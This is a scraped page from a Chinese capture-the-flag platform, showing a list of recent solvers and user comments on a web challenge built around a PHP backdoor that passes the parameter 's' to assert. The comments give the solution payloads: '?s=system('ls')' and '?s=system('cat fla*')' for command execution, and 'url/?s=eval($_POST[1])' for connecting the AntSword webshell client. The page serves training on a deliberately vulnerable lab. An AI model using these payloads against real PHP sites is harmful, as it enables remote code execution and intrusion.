评分(10)
解题动态
aixuexi666 攻破了该题 33分钟前
57 攻破了该题 2小时前
Thompson 攻破了该题 6小时前
song1997 攻破了该题 6小时前
zzz12311 攻破了该题 8小时前
yonge 攻破了该题 11小时前
ruirui102 攻破了该题 12小时前
祥子1 攻破了该题 12小时前
mixiu 攻破了该题 12小时前
tz001 攻破了该题 13小时前
Seb 攻破了该题 14小时前
迷宫 攻破了该题 14小时前
Cooper.juice 攻破了该题 1天前
SXWM 攻破了该题 1天前
Erec 攻破了该题 1天前
Frenemy 攻破了该题 1天前
hsk_zy 攻破了该题 1天前
谢特恒123 攻破了该题 1天前
admincon 攻破了该题 1天前
评论
涵十柒 10月前
举报
描述 的最后一段 猜测传参s /?s=system('ls')发现有回显 直接/?s=system('tac 《题目给的flag文件名》.txt')
牢宁来了 10月前
举报
用/?s=上传一句话木马,再用蚁剑链接
一个姓⎝李⎠的师傅~ 7月前
举报
@violetyy 不是上传,而是同时传递 URL 上查询参数和 POST 请求体里的蚁剑参数
一个姓⎝李⎠的师傅~ 7月前
举报
@xianyu520 不是上传,而是同时传递 URL 上查询参数和 POST 请求体里的蚁剑参数
xianyu520 9月前
举报
老哥,没有上传位置你是怎么在url里做的?个人见识浅薄,请多多指教
violetyy 10月前
举报
怎么上传?连接的url是什么呢?
15290408231 11月前
举报
?s=system(ls) 输入给出的flag.txt文件标题
传奇吉他手千早爱音 11月前
举报
flag{******}
nihaozy 11月前
举报
有大哥是用蚁剑搞的吗,咋把一句话木马上传到对方网站咋连接的???在线求
wrdhv 11月前
举报
蚁剑url地址:url/?s=eval($_POST[1])然后连接密码是1
weiyouzhunze 1年前
举报
标题提示shell告诉我们要命令获取,描述上看得出的是assert($GET['s']),assert()应该不重要,只是判断是否执行正确,关注点是$GET['s'],注入参数s=system(ls),system()是命令执行函数,括号内为字符串,字符串被当作命令执行,这样就可以查看目录下的文件,有个flag的文件,要么执行cat 文件的命令,要么就直接在网站后面加/文件名
HK1ng 1年前
举报
根据描述就能看出已经上传了shell,让我们去利用即可,这里没有用菜刀连,直接手动构造,利用系统命令来实现s=system('ls'),然后可以看到当前目录有flaxxxxx,然后直接cat,s=system('cat fla*'),用一个模糊匹配。
zhwen 1年前
举报
简单PHP木马的利用,s=system("ls");
zfly 1年前
举报
?s=system('ls') ?s=system('cat fla*')
八一卜kod 1年前
举报
cat